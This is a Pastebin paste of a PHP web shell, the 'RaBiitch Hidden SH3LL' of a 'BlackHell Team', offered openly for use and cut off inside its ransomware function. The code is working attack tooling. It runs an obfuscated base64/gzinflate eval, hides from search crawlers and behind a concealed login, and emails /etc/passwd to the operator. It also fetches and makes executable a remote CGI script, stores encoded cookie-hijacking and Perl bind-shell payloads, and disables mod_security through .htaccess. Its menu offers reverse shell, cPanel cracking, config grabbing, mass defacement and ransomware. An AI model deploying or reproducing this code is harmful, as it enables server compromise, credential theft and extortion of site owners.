rabyte

RaBiitch_Hidden_SH3LL.php

Jun 30th, 2018
4,937
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 107.43 KB | None | 0 0
  1. <?php
  2. @session_start();
  3. @ini_set('max_execution_time', 0);
  4. @ini_set('memory_limit', '999999999M');
  5. @set_time_limit(0);
  6. @ini_restore("safe_mode_include_dir");
  7. @ini_restore("safe_mode_exec_dir");
  8. @ini_restore("disable_functions");
  9. @ini_restore("allow_url_fopen");
  10. @ini_restore("safe_mode");
  11. @ignore_user_abort(FALSE);
  12. @ini_set('zlib.output_compression', 'Off');
  13. eval(gzinflate(base64_decode('UyktTi3KS8xNtVUKSnTKzCxJzlCy5uVSKUgsLi7PL0pBE07NTczMsVXKTk0uLclNLM7MMDRwSAeJ6SXn5ypZAwA=')));
  14. function Zip($source, $destination) {
  15.     if(!extension_loaded('zip') || !file_exists($source)) {
  16.         return false;
  17.     }
  18.     $zip = new ZipArchive();
  19.     if(!$zip->open($destination, ZIPARCHIVE::CREATE)) {
  20.         return false;
  21.     }
  22.     $source = str_replace('\\', '/', realpath($source));
  23.     if(is_dir($source) == true) {
  24.         $files = new RecursiveIteratorIterator(new
  25. RecursiveDirectoryIterator($source),
  26. RecursiveIteratorIterator::SELF_FIRST);
  27.         foreach($files as $file) {
  28.             $file = str_replace('\\', '/', realpath($file));
  29.             if(is_dir($file) == true) {
  30.                 $zip->addEmptyDir(str_replace($source . '/', '', $file
  31. .
  32. '/'));
  33.             } else if(is_file($file) == true) {
  34.                 $zip->addFromString(str_replace($source . '/', '',
  35. $file), file_get_contents($file));
  36.             }
  37.         }
  38.     } else if(is_file($source) == true) {
  39.         $zip->addFromString(basename($source),
  40. file_get_contents($source));
  41.     }
  42.     return $zip->close();
  43. }
  44. if(isset($_GET['zip'])) {
  45.     $src = $_GET['zip'];
  46.     $dst = getcwd() . "/" . basename($_GET['zip']) .
  47. ".zip";
  48.     if(Zip($src, $dst) != false) {
  49.         $filez = file_get_contents($dst);
  50.         header("Content-type: application/octet-stream");
  51.         header("Content-length: " . strlen($filez));
  52.         header("Content-disposition: attachment;
  53. filename=\"" . basename($dst) . "\";");
  54.         echo $filez;
  55.     }
  56.     exit;
  57. }
  58. @error_reporting(4);
  59. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  60.     $userAgents = array(
  61.         "Google",
  62.         "Slurp",
  63.         "MSNBot",
  64.         "ia_archiver",
  65.         "Yandex",
  66.         "Rambler"
  67.     );
  68.     if(preg_match('/' . implode('|', $userAgents) . '/i',
  69. $_SERVER['HTTP_USER_AGENT'])) {
  70.         header('HTTP/1.0 404 Not Found');
  71.         exit;
  72.     }
  73. }
  74. echo "<meta name=\"ROBOTS\" content=\"NOINDEX,
  75. NOFOLLOW\" />";
  76. echo "
  77. <style>
  78. .kedip {
  79. -webkit-animation-name: blinker;
  80. -webkit-animation-duration:3s;
  81. -webkit-animation-timing-function: linear;
  82. -webkit-animation-iteration-count: infinite;
  83.  
  84. -moz-animation-name: blinker;
  85. -moz-animation-duration:2s;
  86. -moz-animation-timing-function: linear;
  87. -moz-animation-iteration-count: infinite;
  88.  
  89. animation-name: blinker;
  90. animation-duration:3s;
  91. animation-timing-function: linear;
  92. animation-iteration-count: infinite;
  93. }
  94. @-moz-keyframes blinker {  
  95. 0% { opacity: 1.0; }
  96. 50% { opacity: 0.0; }
  97. 100% { opacity: 1.0; }
  98. }
  99. @-webkit-keyframes blinker {  
  100. 0% { opacity: 1.0; }
  101. 50% { opacity: 0.0; }
  102. 100% { opacity: 1.0; }
  103. }
  104. @keyframes blinker {  
  105. 0% { opacity: 1.0; }
  106. 50% { opacity: 0.0; }
  107. 100% { opacity: 1.0; }
  108. }
  109. input {
  110. font-size:11px;
  111. background:#191919;
  112. color:yellow;
  113. margin:0 4px;
  114. border:1px solid #008080;
  115. }
  116. .hidden {
  117.     background:white;
  118.     border:1px solid white;
  119.     color:white;
  120.     }
  121.     td {
  122.     border-radius:5px;
  123.     font-size:11px;
  124.     }
  125.     .header {
  126.         size:25px;
  127.         color:yellow;
  128.         }
  129.    .go {
  130.         height:50px;
  131.         width:50px;
  132.         float:left;
  133.         margin-right:10px;
  134.         display:none;
  135.         background-color:#090;
  136.         }
  137.    .input_big {
  138.         width:75px;
  139.         height:30px;
  140.         background:#191919;
  141.         color:yellow;
  142.         margin:0 4px;
  143.         border:1px solid #222222;
  144.         font-size:17px;
  145.         }
  146.    hr { border:1px solid #222222; }
  147.    #meunlist {
  148.         width:auto;
  149.         height:auto;
  150.         font-size:12px;
  151.         font-weight:bold;
  152.         }
  153.    #meunlist ul {
  154.         padding-top:5px;
  155.         padding-right:5px;
  156.         padding-bottom:7px;
  157.         padding-left:2px;
  158.         text-align:center;
  159.         list-style-type:none;
  160.         margin:0px;
  161.         }
  162.    #meunlist li {
  163.         margin:0px;
  164.         padding:0px;
  165.         display:inline;
  166.         }
  167.    #meunlist a {
  168.         font-size:14px;
  169.         text-decoration:none;
  170.         font-weight:bold;
  171.         color:white;
  172.         clear:both;
  173.         width:100px;
  174.         margin-right:-6px;
  175.         padding-top:3px;
  176.         padding-right:15px;
  177.         padding-bottom:3px;
  178.         padding-left:15px;
  179.         }
  180.    #meunlist a:hover { background: #333; color:#008080; }
  181.    .menubar {
  182.         -moz-border-radius:10px;
  183.         border-radius:10px;
  184.         border:1px solid #008080;
  185.         padding:4px 8px;
  186.         line-height:16px;
  187.         background:#000;
  188.         color:#aaa;
  189.         margin:0 0 8px 0;
  190.         }
  191.    .menu { font-size:25px; color:#008080 }
  192.    .textarea_edit,textarea{
  193.         background-color:#111111;
  194.         border:1px groove #333;
  195.         color:lime;
  196.         width: 911px;
  197.         height: 326px;
  198.         font-size:15px;
  199.         text-decoration:none;
  200.         border:1px dashed #333;
  201.         }
  202.    .input_butt {
  203.         font-size:11px;
  204.         background:#191919;
  205.         color:#4C83AF;
  206.         margin:0 4px;
  207.         border:1px solid #222222;
  208.         }
  209.    #result {
  210.         -moz-border-radius:10px;
  211.         border-radius:10px;
  212.         border:1px solid #008080;
  213.         padding:4px 8px;
  214.         line-height:16px;
  215.         background:#000;
  216.         color:#fff; margin:0 0 8px 0;
  217.         min-height:100px;
  218.         }
  219.    .table {
  220.         width:100%;
  221.         padding:4px 0;
  222.         color:#888;
  223.         font-size:15px;
  224.         }
  225.    .table a {
  226.         text-decoration:none;
  227.         color:white;
  228.         font-size:15px;
  229.         }
  230.    .table a:hover {
  231.         text-decoration:underline;
  232.         }
  233.    .table td {
  234.         border-bottom:1px solid #008080;
  235.         padding:0 8px;
  236.         line-height:24px;
  237.         vertical-align:top;
  238.         }
  239.    .table th {
  240.         padding:3px 8px;
  241.         font-weight:normal;
  242.         background:#222222;
  243.         color:#555; }
  244.    .table tr:hover { background:#181818; }
  245.    .tbl{
  246.         width:100%;
  247.         padding:4px 0;
  248.         color:#888;
  249.         font-size:15px;
  250.         text-align:center;
  251.         }
  252.    .tbl a {
  253.         text-decoration:none;
  254.         color:yellow;
  255.         font-size:15px;
  256.         vertical-align:middle;
  257.         }
  258.    .tbl a:hover { text-decoration:underline; }
  259.    .tbl td {
  260.         border-bottom:1px solid #222222;
  261.         padding:0 8px;
  262.         line-height:24px;  
  263.         vertical-align:middle;
  264.         width:300px;
  265.         }
  266.    .tbl th {
  267.         padding:3px 8px;
  268.         font-weight:normal;
  269.         background:#222222;
  270.         color:#555;
  271.         vertical-align:middle;
  272.         }
  273.    .tbl td:hover { background:#181818; }
  274.    #alert { position: relative; }
  275.    #alert:hover:after { background: hsla(0,0%,0%,.8);
  276.     border-radius:3px;
  277.     color:#f6f6f6;
  278.     content:'Close';
  279.     font:bold 12px/30px
  280.     sans-serif;
  281.     height:30px;
  282.     left:50%;
  283.     margin-left:-60px;position:absolute;
  284.     text-align:center;
  285.     top:50px;
  286.     width:120px;
  287.     }
  288.    #alert:hover:before {
  289.         border-bottom:10px solid hsla(0,0%,0%,.8);
  290.         border-left:10px solid transparent;
  291.         border-right:10px solid transparent;
  292.         content:'';
  293.         height: 0;
  294.         left:50%;
  295.         margin-left:-10px;
  296.         position:absolute;
  297.         top:40px;
  298.         width:0;
  299.         }
  300.    #alert:target { display: none; }
  301.    .alert_red {
  302.         animation:alert 1s ease forwards;background-color:#c4453c;
  303.         background-image:linear-gradient(135deg, transparent,transparent 25%,
  304. hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent
  305. 75%,
  306. hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;
  307.         box-shadow:0 5px 0 hsla(0,0%,0%,.1);
  308.         color:#f6f6f6;
  309.         display:block;
  310.         font:bold 16px/40px sans-serif;
  311.         height:40px;
  312.         position:absolute;
  313.         text-align:center;
  314.         text-decoration:none;
  315.         top:-45px;
  316.         width:100%;
  317.         }
  318.    .alert_yellow {
  319.         animation:alert 1s ease forwards;
  320.         background-color:#43CD80;
  321.         background-image:linear-gradient(135deg, transparent,transparent 25%,
  322. hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent
  323. 75%,
  324. hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;
  325.         box-shadow:0 5px 0 hsla(0,0%,0%,.1);
  326.         color:#f6f6f6;display:block;
  327.         font:bold 16px/40px sans-serif;height:40px;
  328.         position:absolute;text-align:center;
  329.         text-decoration:none;
  330.         top:-45px;
  331.         width:100%;
  332.         }
  333.    @keyframes alert {0% { opacity: 0; }50% { opacity: 1; }100% { top: 0;
  334. }}
  335.    #divAlert { background-color:yellow; color:red;}
  336.    </style>
  337.     <div id=divAlert></div>";
  338. if($_COOKIE["user"] != $username &&
  339. $_COOKIE["pass"] != md5($password)) {
  340.     if($_POST["usrname"] == $username &&
  341. $_POST["passwrd"] == $password) {
  342.         print '<script>document.cookie="user=' .
  343. $_POST["usrname"] . ';";document.cookie="pass=' .
  344. md5($_POST["passwrd"]) . ';";</script>';
  345.         if($email != "") {
  346.             mail_alert();
  347.         }
  348.     } else {
  349.         if($_POST['usrname']) {
  350.             print '<script>alert("Wrong Username or
  351. password");</script>';
  352.         }
  353.         echo '
  354. <h1>Permission Denied</h1>
  355. <p>You don t have permission to access the this page.</p>
  356. <form method="post">
  357.  
  358. <input class="hidden" type="password"
  359. size="30" name="passwrd" value=""
  360. onfocus="if (this.value == \'password\')
  361. this.value = \'\';">
  362. <input type="hidden" name="action"
  363. value="login">
  364. <input type="hidden" name="hide"
  365. value="">
  366. <input type="hidden" size="30"
  367. name="usrname" value="RaBiitch" onfocus="if
  368. (this.value == \'username\'){this.value = \'\';}">
  369. </form>';
  370.         exit;
  371.     }
  372. }
  373. $color_g   = "yellow";
  374. $color_b   = "4C83AF";
  375. $color_bg  = "#111111";
  376. $color_hr  = "#222";
  377. $color_wri = "yellow";
  378. $color_rea = "yellow";
  379. $color_non = "red";
  380. $path      = $_GET['path'];
  381. $sep       = "/";
  382. $date      = date('d-M-Y H:i:s');
  383. if(strtolower(substr(PHP_OS, 0, 3)) == "win") {
  384.     $os  = "win";
  385.     $sep = "\\";
  386.     $ox  = "Windows";
  387. } else {
  388.     $os = "nix";
  389.     $ox = "Linux";
  390. }
  391. $self              = $_SERVER['PHP_SELF'];
  392. $srvr_sof          = $_SERVER['SERVER_SOFTWARE'];
  393. $your_ip           = $_SERVER['REMOTE_ADDR'];
  394. $srvr_ip           = $_SERVER['SERVER_ADDR'];
  395. $admin             = $_SERVER['SERVER_ADMIN'];
  396. $s_php_ini         = "safe_mode=OFF
  397. disable_functions=NONE";
  398. $ini_php           = "
  399. <?php
  400. echo ini_get(\"safe_mode\");
  401. echo ini_get(\"open_basedir\");
  402. include(\$_GET[\"file\"]);
  403. ini_restore(\"safe_mode\");
  404. ini_restore(\"open_basedir\");
  405. echo ini_get(\"safe_mode\");
  406. echo ini_get(\"open_basedir\");
  407. include(\$_GET[\"ss\"]);
  408. ?>";
  409. $s_htaccess        = "
  410. <IfModule mod_security.c>
  411. Sec------Engine Off
  412. Sec------ScanPOST Off
  413. </IfModule>";
  414. $s_htaccess_pl     = "
  415. Options FollowSymLinks MultiViews Indexes ExecCGI
  416. AddType application/x-httpd-cgi .sh
  417. AddHandler cgi-script .pl";
  418. $sym_htaccess      = "Options all
  419. DirectoryIndex Sux.html
  420. AddType text/plain .php
  421. AddHandler server-parsed .php
  422. AddType text/plain .html
  423. Require None
  424. Satisfy Any";
  425. $sym_php_ini       = "
  426. safe_mode=OFF
  427. disable_functions=NONE";
  428. $forbid_dir        = "Options -Indexes";
  429. $cookie_highjacker =
  430. "rVVdc5pAFH13xv9wh3Eipq22M3miasaJGGmNWsS2mU6HQVyEFlnCLkk7If+9d8EPCKFtpuVB2d1z7z177gf1Wvc8dMN6rXP6av/AJQlIZHGyBouBBaEVcaAOaNOhPninGWNYjNXJBMKIfiM2h53Zaadec+LA5h4N0AXX5nKrXruv1wAfzwF5QzgJbmVpbBhz82KiqVPD1OZSC05OgPHIthixt2El7CVIcfA9oHeB1GplXnfOxdPwQuhBle3bDPiQ/RGfkTKjz+Zopn8a6EN1KN5+z6sEfja7koc/cNTVq5mhmoPhsJpaAfMcRgXDCiIeY4TLDXOh6h9V/UszZ9P8mjKqOHtEtgL1N3QrTMuEK+wPEYoWEeFxFMiIEXd/yJWxTzdDi1u5QkbQhG56kk0Dx9vE2CaIY23+g++dNmxKv3ukQPfDUtWvzYWha9PLA99GRDYe4yQyNz5dWT5DE3lFqd8CL/BMzI3cPEJSRHOfHJGQkn2rmNWCSHvDNJ0ZbNejeHDgszVDis3+hNLzmW4cmccMo1obEhSxaWEvcWUOLrH1cje9YdzcEu7SdcHgSjXGs2Feka3pUvYkg/FskfdIHBKRqBxeV0eqrh6rorHGSdYTPyBLPqwXYpSN4BpcxVMYDA713sBk9xwakkCWsixLWJPWC+mokFA9RNXNrcVtV5Y6K5dvVx0PgZlFC5IESgi/ACkXtxPGnMkiPgbU5kqanwSE5EouKwkICZScSgkMRA6UQkISyFRVirIngMooR+ESGA4M9R4UeMg0wp2L2ey9pirHGu6uov5TA+F/XuGf7pBeQqm+QBA8pu/YPmUkpbrr9kOT45LYLgWpXuuKtPW7LrHWfVxxj/ukf/b6DKaUw4jGwbrbyTbxtJPCuiu6/imW7pt+DoUr3Av7hktw0NzEhIkP61KfgNQuFDnOiIVhLnUNJ2Zbgjv89gboxhFuAGcRdz0GKNEtidrdTpgGTkOKwXOOy18=";
  431. $bind_perl         =
  432. "rZJdb5swFIavi8R/OHXTFSSmZJu2i0abxAjtWApEQLtNVYUoOK1VgimmmqIq/30+dpKmmna1+Aq/7/Fzvjg6HD6JbnjLmmFLuxre/jYN0zjax5EY+P+jMee0oV3R0woKAQW0RdcDn0MQTRL3e5B9g5A1DNJ7WtfwdQlKm84+fhrBdRaf3Wwwe6lmP7MxjSdBIeXlA+3H+uLxZs7u5GXAhcr2GQZae+aiKRZ0hV7Lu/5AOm5yfnU9ulFSx3sutTvaq8/bJUZbJ33ZntgYUC4qaZO6rcgYUw/EUvR0gZpavbjXOptbmJs+AgnTH6z58J7YpvFsGgfrF7IkcuzFYTrzvWMYTvHZShFHWK3MozhCtWWlfnLlJw7MzvIg8jMH0tib5mmW+G7ogC7bBt5BxSgQ/eh0cIhQQXu88/aFksYXOQI0KE/8y9R3JxPptEX5YJGaOPDO3uFtEaegobLVaotDr6iqLmeNpYbqyN8Jebkb/drB4KMNoGZyCM1ORaH704uj6CVaR2ziTWPOO2ssW8VMckJFWVLZkncR+BG2oUD2GMqa4w+g5PXEeYuZskkQOUC+vNEewXVurfgy+6fnJ8lfnt6htd6lklRineb1XbJfCxKIwuoP";
  433. if($safemode == "On") {
  434.     echo "<div id='alert'><a
  435. class=\"alert_yellow\"
  436. href=\"#alert\">Safe Mode : <font
  437. color=red>ON</font></a></div>";
  438. } else {
  439.     echo "<div id='alert'><a
  440. class=\"alert_yellow\"
  441. href=\"#alert\">Safe Mode : <font
  442. color=lime>OFF</font></a></div>";
  443. }
  444. echo "<script
  445. src=\"http://code.jquery.com/jquery-latest.js\"></script><script>$(\"#alert\").delay(2000).fadeOut(300);</script>";
  446. echo "<title>RaBiitch Hidden SH3LL</title>
  447. <link href='http://fonts.googleapis.com/css?family=Iceland'
  448. rel='stylesheet' type='text/css'>
  449. <body bgcolor=black>
  450. <div id=result>
  451. <table>
  452. <tbody>
  453. <tr>
  454. <td style='border-right:1px solid #104E8B;'
  455. width=\"300px;\">
  456. <div style='text-align:center;'>
  457. <a href='?' style='text-decoration:none;'>
  458. <pre onkeydown=return false; onmousedown=return false; class=kedip
  459. style='color:lime;'>
  460.  
  461.    
  462. </pre>
  463. </a><font
  464. color=yellow>=========== BlackHell Team ===========</font>
  465. </div></td>
  466. <td>
  467. <div class=\"header\">OS</font>
  468. <font color=\"#666\" >:</font>
  469. " . $ox . " </font> <font color=\"#666\"
  470. >|</font>
  471. " . php_uname() . "<br>
  472. Your IP : <font color=red>" . $your_ip . "</font>
  473. <font color=\"#666\" >|</font>
  474. Server IP : <font color=red>" . $srvr_ip . "</font>
  475. <font color=\"#666\" > | </font>
  476.  Admin <font color=\"#666\" > : </font>
  477. <font color=red> {$admin} </font><br>MySQL <font
  478. color=\"#666\" > : </font>";
  479. echo mysqlx();
  480. echo "<font color=\"#666\" > |
  481. </font> Oracle <font color=\"#666\" > :
  482. </font>";
  483. echo oraclesx();
  484. echo "<font color=\"#666\" > |
  485. </font> MSSQL <font color=\"#666\" > :
  486. </font>";
  487. echo mssqlx();
  488. echo "<font color=\"#666\" > |
  489. </font> PostGreySQL <font color=\"#666\" > :
  490. </font>";
  491. echo postgreyx();
  492. echo "<br />cURL <font color=\"#666\"
  493. > : </font>";
  494. echo curlx();
  495. echo "<font color=\"#666\" > |
  496. </font>Total Space<font color=\"#666\" > :
  497. </font>";
  498. echo disc_size();
  499. echo "<font color=\"#666\" > |
  500. </font>Free Space<font color=\"#666\" > :
  501. </font>";
  502. echo freesize();
  503. echo "<br />Software<font
  504. color=\"#666\" > : </font><font
  505. color=red>{$srvr_sof}</font>
  506. <font color=\"#666\">
  507. | </font> PHP<font color=\"#666\" > :
  508. </font><a style='color:red; text-decoration:none;' target=_blank
  509. href=?phpinfo>" . phpversion() . "</a>
  510. <br />Disabled Functions<font
  511. color=\"#666\"
  512. > : </font></font><font color=red>";
  513. echo disabled_functns() . "</font><br />";
  514. if($os == 'win') {
  515.     echo "Drives <font color=\"#666\" > :
  516. </font>";
  517.     echo drivesx();
  518. } else {
  519.     echo "r00t Exploit
  520. <font color=\"#666\" > : </font>
  521. <font color=red>";
  522.     echo r00t_exploit() . "</font>";
  523. }
  524. echo "
  525. </div>
  526. </td>
  527. </tr>
  528. </tbody>
  529. </table></div>";
  530. echo "
  531. <div class='menubar'>
  532. <div id=\"meunlist\" align=center>
  533. <ul>
  534. <li>[<a href=\"?ngindex\">Priv
  535. Index</a>]</li>
  536. <li>[<a href=\"?cgi\">CGI
  537. Telnet</a>]</li>
  538. <li>[<a href=\"?rs\">Reverse
  539. Shell</a>]</li>
  540. <li>[<a href=\"?jembud2\">b374k
  541. 2</a>]</li>
  542. <li>[<a
  543. href=\"?idx\">IndoXploit</a>]</li>
  544. </ul><ul>
  545. <li>[<a href=\"?musik\">Sound
  546. Cloud</a>]</li>
  547. <li>[<a href=\"?rctm\">Realtime DDOS
  548. Map</a>]</li>
  549. <li>[<a
  550. href=\"?encodefile\">Encode/Decode</a>]</li>
  551. <li>[<a href=\"?path={$path}&amp;safe_mod\">Safe
  552. Mode Fucker</a>]</li>
  553. <li>[<a href=\"?path={$path}&amp;forbd_dir\">Dir
  554. Listing Forbidden</a>]</li>
  555. </ul><ul>
  556. <li>[<a href=\"?massmailer\">Mass
  557. Mailer</a>]</li>
  558. <li>[<a href=\"?cpanel_crack\">cPanel
  559. Crack</a>]</li>
  560. <li>[<a href=\"?sh311_scanner\">Backdoor
  561. Scan</a>]</li>
  562. <li>[<a href=\"?server_exploit_details\">Exploit
  563. Details</a>]</li>
  564. <li>[<a href=\"?remote_server_scan\">Remote Server
  565. Scan</a>]</li>
  566. </ul><ul>
  567. <li>[<a href=\"?remotefiledown\">Remote File
  568. Downloader</a>]</li>
  569. <li>[<a href=\"?hexenc\">Hex
  570. Encode/Decode</a>]</li>
  571. <li>[<a href=\"?ftp_anon_scan\">FTP Anonymous Access
  572. Scaner</a>]</li>
  573. <li>[<a
  574. href=\"?path={$path}&amp;mass_xploit\">Mass
  575. Deface</a>]</li>
  576. <li>[<a href=\"?config_grab\">Config
  577. Grabber</a>]</li>
  578. </ul><ul>
  579. <li>[<a
  580. href=\"?symlink\">SymLink</a>]</li>
  581. <li>[<a href=\"?cookiejack\">Cookie
  582. Hijack</a>]</li>
  583. <li>[<a href=\"?sshman\">Secure
  584. Shell</a>]</li>
  585. <li>[<a href=\"?path={$path}&c0de_inject\">Mass
  586. Overwrite</a>]</li>
  587. <li>[<a href=\"?ftpman\">FTP
  588. Manager</a>]</li>
  589. </ul><ul>
  590. <li>[<a
  591. href=\"?ganteng\">Ransomeware</a>]</li>
  592. <li>[<a href=\"?logger\">Check
  593. Steganologer</a>]</li>
  594. <li>[<a
  595. href=\"?adminer\">Adminer</a>]</li>
  596. <li>[<a href=\"?phpinfo\">PHP
  597. Info</a>]</li>
  598. <li>[<a href=\"?terjemah\">Byksw
  599. Translate</a>]</li>
  600. <li>[<li class=kedip><a
  601. href=\"?killme\"><font
  602. color='#008080'>Suicide</font></a></li>]</li>
  603. </ul>
  604. </div>
  605. </div>";
  606. function alert($alert_txt) {
  607.     echo "<div id=divAlert>" . $alert_txt .
  608. "</div>";
  609.     echo "<script>alert('" . $alert_txt .
  610. "');window.location.href='?';</script>";
  611. }
  612. function disabled_functns() {
  613.     if(!@ini_get('disable_functions')) {
  614.         echo "None";
  615.     } else {
  616.         echo @ini_get('disable_functions');
  617.     }
  618. }
  619. function drivesx() {
  620.     foreach(range('A', 'Z') as $drive) {
  621.         if(is_dir($drive . ':\\')) {
  622.             echo "<a> [<a style='color:aqua;
  623. text-decoration:none;' href='?path=" . $drive . ":\\'> "
  624. . $drive . " </a>] </a>";
  625.         }
  626.     }
  627. }
  628. function mail_alert() {
  629.     global $email;
  630.     $passwd       = file_get_contents('/etc/passwd');
  631.     $shell_path   = "http://" . $_SERVER['SERVER_NAME'] .
  632. $_SERVER['REQUEST_URI'];
  633.     $subject      = "Logs";
  634.     $from         = "From:RaBiitch";
  635.     $content_mail = "URL : $shell_path\nIP : " .
  636. $_SERVER['REMOTE_ADDR'] . "\n**********\n$passwd\n**********\nBlackHell Team";
  637.     mail($email, $subject, $content_mail, $from);
  638. }
  639. function filesizex($size) {
  640.     if($size >= 1073741824)
  641.         $size = round(($size / 1073741824), 2) . " GB";
  642.     elseif($size >= 1048576)
  643.         $size = round(($size / 1048576), 2) . " MB";
  644.     elseif($size >= 1024)
  645.         $size = round(($size / 1024), 2) . " KB";
  646.     else
  647.         $size .= " B";
  648.     return $size;
  649. }
  650. function disc_size() {
  651.     echo filesizex(disk_total_space("/"));
  652. }
  653. function freesize() {
  654.     echo filesizex(disk_free_space("/"));
  655. }
  656. function file_perm($filz) {
  657.     if($m = fileperms($filz)) {
  658.         $p = '';
  659.         $p .= ($m & 00400) ? 'r' : '-';
  660.         $p .= ($m & 00200) ? 'w' : '-';
  661.         $p .= ($m & 00100) ? 'x' : '-';
  662.         $p .= ($m & 00040) ? 'r' : '-';
  663.         $p .= ($m & 00020) ? 'w' : '-';
  664.         $p .= ($m & 00010) ? 'x' : '-';
  665.         $p .= ($m & 00004) ? 'r' : '-';
  666.         $p .= ($m & 00002) ? 'w' : '-';
  667.         $p .= ($m & 00001) ? 'x' : '-';
  668.         return $p;
  669.     }
  670. }
  671. function mysqlx() {
  672.     if(function_exists('mysql_connect')) {
  673.         echo "<font color='aqua'>Enabled</font>";
  674.     } else {
  675.         echo "<font
  676. color='#008080'>Disabled</font>";
  677.     }
  678. }
  679. function oraclesx() {
  680.     if(function_exists('oci_connect')) {
  681.         echo "<font color='aqua'>Enabled</font>";
  682.     } else {
  683.         echo "<font
  684. color='#008080'>Disabled</font>";
  685.     }
  686. }
  687. function mssqlx() {
  688.     if(function_exists('mssql_connect')) {
  689.         echo "<font color='aqua'>Enabled</font>";
  690.     } else {
  691.         echo "<font
  692. color='#008080'>Disabled</font>";
  693.     }
  694. }
  695. function postgreyx() {
  696.     if(function_exists('pg_connect')) {
  697.         echo "<font color='aqua'>Enabled</font>";
  698.     } else {
  699.         echo "<font
  700. color='#008080'>Disabled</font>";
  701.     }
  702. }
  703. function strip($filx) {
  704.     if(!get_magic_quotes_gpc())
  705.         return trim(urldecode($filx));
  706.     return trim(urldecode(stripslashes($filx)));
  707. }
  708. function curlx() {
  709.     if(function_exists('curl_version')) {
  710.         echo "<font color='aqua'>Enabled</font>";
  711.     } else {
  712.         echo "<font
  713. color='#008080'>Disabled</font>";
  714.     }
  715. }
  716. function filesize_x($filex) {
  717.     $f_size = filesizex(filesize($filex));
  718.     return $f_size;
  719. }
  720. function rename_ui() {
  721.     $rf_path = $_GET['rename'];
  722.     echo "<div id=result>
  723.     <center><h2>Rename</h2><hr><p><br><br>
  724.     <form method='GET'><input type=hidden name='old_name' size='40'
  725. value=" . $rf_path . ">New Name : <input name='new_name'
  726. size='40' value=" . basename($rf_path) . ">
  727.     <input type='submit'
  728. value='submit'></form></p><br><br><hr><br><br></center></div>";
  729. }
  730. function terjemah() {
  731.     echo '
  732.     <center>
  733.     <form method="post">
  734.     <textarea style="width: 670px; height: 243px;"
  735. name="text"></textarea><br />
  736.     <input type="submit" name="submit"
  737. value="terjemah" />
  738.     </form>
  739.     <textarea style="width: 670px; height: 243px;"
  740. readonly>';
  741. if($_POST["submit"] == "terjemah") {
  742.     $text=$_POST["text"];
  743.     $output=str_replace("e","w",$text);
  744.     $output2=str_replace("o","w",$output);
  745.     $output3=str_replace("a","w",$output2);
  746.     $output4=str_replace("u","w",$output3);
  747.     $output5=str_replace("i","y",$output4);
  748.     // huruf gede
  749.     $output6=str_replace("E","W",$output5);
  750.     $output7=str_replace("O","W",$output6);
  751.     $output8=str_replace("A","W",$output7);
  752.     $output9=str_replace("U","W",$output8);
  753.     $output10=str_replace("I","Y",$output9);
  754.     echo $output10;
  755.     }
  756. echo "</textarea></center>";
  757. }
  758. function cgi() {
  759.     if(!file_exists('.config')) {
  760.         mkdir('.config', 0755);
  761.     }
  762.     $file_cgi   = ".config/cgi.izo";
  763.     $isi_htcgi  = "
  764. AddHandler cgi-script .izo
  765. Options -Indexes";
  766.     $htcgi      = fopen(".config/.htaccess", "w+");
  767.     $cgi_script =
  768. file_get_contents("https://pastebin.com/raw/MUD0EPjb");
  769.     $cgi        = fopen($file_cgi, "w+");
  770.     fwrite($cgi, $cgi_script);
  771.     fwrite($htcgi, $isi_htcgi);
  772.     chmod($file_cgi, 0755);
  773.     echo "<iframe src='.config/cgi.izo' width='100%' height='100%'
  774. frameborder='0' scrolling='no'></iframe>";
  775. }
  776. function rctm() {
  777.     echo "<iframe width='100%' height='100%'
  778. src='https://threatmap.fortiguard.com' frameborder='0'>";
  779. }
  780. function soundcloud() {
  781.     echo "<iframe width='100%' height='100%' scrolling='no'
  782. frameborder='no'
  783. src='https://w.soundcloud.com/player/?url=https://api.soundcloud.com/playlists/355874911&amp;color=#00cc11&amp;auto_play=true&amp;hide_related=false&amp;show_comments=true&amp;show_user=true&amp;show_reposts=false&amp;show_teaser=true&amp;visual=true'></iframe>";
  784. }
  785. function gantengware() {
  786.     echo "
  787. <style type='text/css'>
  788. body {
  789.    background: #1A1C1F;
  790.    color: #e2e2e2;
  791. }
  792. .inpute{
  793.    border-style: dotted;
  794.    border-color: #379600;
  795.    background-color: transparent;
  796.    color: white;
  797.    text-align: center;
  798. }
  799. .selecte{
  800.    border-style: dotted;
  801.    border-color: green;
  802.    background-color: transparent;
  803.    color: green;
  804. }
  805. .submite{
  806.       border-style: dotted;
  807.    border-color: #4CAF50;
  808.    background-color: transparent;
  809.    color: white;
  810. }
  811. .result{
  812.  text-align: left;
  813. }
  814. </style>
  815. <link rel='stylesheet' type='text/css'
  816. href='https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css'>
  817. </head>
  818. <body>
  819. <div class='result'>";
  820.     error_reporting(0);
  821.     set_time_limit(0);
  822.     ini_set('memory_limit', '-1');
  823.     class deRanSomeware {
  824.         public function shcpackInstall() {
  825.             if(!file_exists(".htabak")) {
  826.                 rename(".htaccess", ".htabak");
  827.                 if(fwrite(fopen('.htaccess', 'w+'), "\rDirectoryIndex
  828. index.php\r\nErrorDocument 404 /index.php")) {
  829.                     echo '<i class="fa fa-thumbs-o-up"
  830. aria-hidden="true"></i> .htaccess (Default
  831. Page)<br>';
  832.                 }
  833.                 if(file_put_contents("index.php",
